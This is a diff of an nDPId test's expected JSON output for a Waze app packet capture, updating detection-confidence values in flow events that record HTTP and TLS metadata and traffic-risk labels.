+00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587867755,"flow_last_seen":1435587867781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":263,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1435587867781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":0,"content_type":"","user_agent":"Android"}} 
00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1435587868123,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":91,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":91,"pkt_l4_len":57,"thread_ts_msec":1435587868123,"pkt":"ABoRAAACABoRAAABCABFAABNMsNAAEAGQsQKECWdriXnUaUQFGaA18okWhY9doAYAVcnqgAAAQEICgAIa9FBJdw4gAAWBXL2KZLscQ7\/r4Q3YR6R6YsREWIs0w=="} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868632,"flow_last_seen":1435587868632,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868632,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1435587868632,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868632,"pkt":"ABoRAAACABoRAAABCABFAAA814xAAEAGPpQKCAABNubjrLHZAFCatruPAAAAAKAC\/\/+u6AAAAgQFtAQCCAoACGwDAAAAAAEDAwg="} 
@@ -25,26 +25,26 @@ 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1435587868644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868644,"pkt":"ABoRAAACABoRAAABCABFAAAo141AAEAGPqcKCAABNubjrLHZAFCatruQZUlEcVAQ\/\/\/ZDQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAojYdAAEAGx1YKCAABLjOtto0EAbvOcuGGMY0ee1AQ\/\/87IQAA"} 00448{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1435587868645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868645,"pkt":"ABoRAAACABoRAAABCABFAAAoH6pAAEAGNTQKCAABLjOtto0GAbtbbHOupJOMU1AQ\/\/87HwAA"} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868632,"flow_last_seen":1435587868906,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":83,"flow_avg_l4_payload_len":20,"midstream":0,"thread_ts_msec":1435587868906,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
+00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868632,"flow_last_seen":1435587868910,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":83,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1435587868910,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"roadshields.waze.com","url":"roadshields.waze.com\/images\/HD\/CH2.png","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587868996,"flow_last_seen":1435587868996,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587868996,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1435587868996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587868996,"pkt":"ABoRAAACABoRAAABCABFAAA8cVdAAEAGm2kKCAABrcJ2MI7pAburox1\/AAAAAKAC\/\/9UDAAAAgQFtAQCCAoACGwoAAAAAAEDAwg="} 
00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1435587868998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587868998,"pkt":"ABoRAAACABoRAAABCABFAAAodHhAABAGyFytwnYwCggAAQG7julUXOKAq6MdgFAS\/\/\/xMQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1435587869002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869002,"pkt":"ABoRAAACABoRAAABCABFAAAocVhAAEAGm3wKCAABrcJ2MI7pAburox2AVFzigVAQ\/\/\/xMgAA"} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868634,"flow_last_seen":1435587869002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869002,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00932{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868996,"flow_last_seen":1435587869054,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1435587869054,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587868635,"flow_last_seen":1435587869106,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587869106,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00979{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"waze.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868996,"flow_last_seen":1435587869107,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1435587869107,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.194.118.48","src_port":36585,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"23f1f6e2f0015c166df49fdab4280370","unsafe_cipher":2,"cipher":"TLS_ECDHE_RSA_WITH_RC4_128_SHA"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587869162,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587869162,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587869162,"pkt":"ABoRAAACABoRAAABCABFAAA8XmhAAEAGt7gKCAABNubjrLHgAFDjpDJQAAAAAKAC\/\/\/u\/QAAAgQFtAQCCAoACGw4AAAAAAEDAwg="} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1435587869163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAodIRAABAG0bA25uOsCggAAQBQseAcW82v46QyUVAS\/\/\/ZBQAA"} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1435587869163,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587869163,"pkt":"ABoRAAACABoRAAABCABFAAAoXmlAAEAGt8sKCAABNubjrLHgAFDjpDJRHFvNsFAQ\/\/\/ZBgAA"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} -01087{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":66,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868635,"flow_last_seen":1435587869425,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587869425,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"waze.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587868634,"flow_last_seen":1435587869476,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587869476,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36100,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
-01341{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"waze.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587868635,"flow_last_seen":1435587869477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587869477,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36102,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":92,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587867755,"flow_last_seen":1435587871459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1631,"flow_avg_l4_payload_len":271,"midstream":0,"thread_ts_msec":1435587871459,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {"hostname":"xtra1.gpsonextra.net","url":"xtra1.gpsonextra.net\/xtra2.bin","code":200,"content_type":"application\/octet-stream","user_agent":"Android"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587869162,"flow_last_seen":1435587869165,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1435587869165,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":54,"source":"waze.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587869162,"flow_last_seen":1435587869166,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1435587869166,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45536,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"},"http": {"hostname":"cres.waze.com","url":"cres.waze.com\/lang_asr\/lang.portuguese_br_asr","code":0,"content_type":"","user_agent":"\/3.9.4.0"}} 
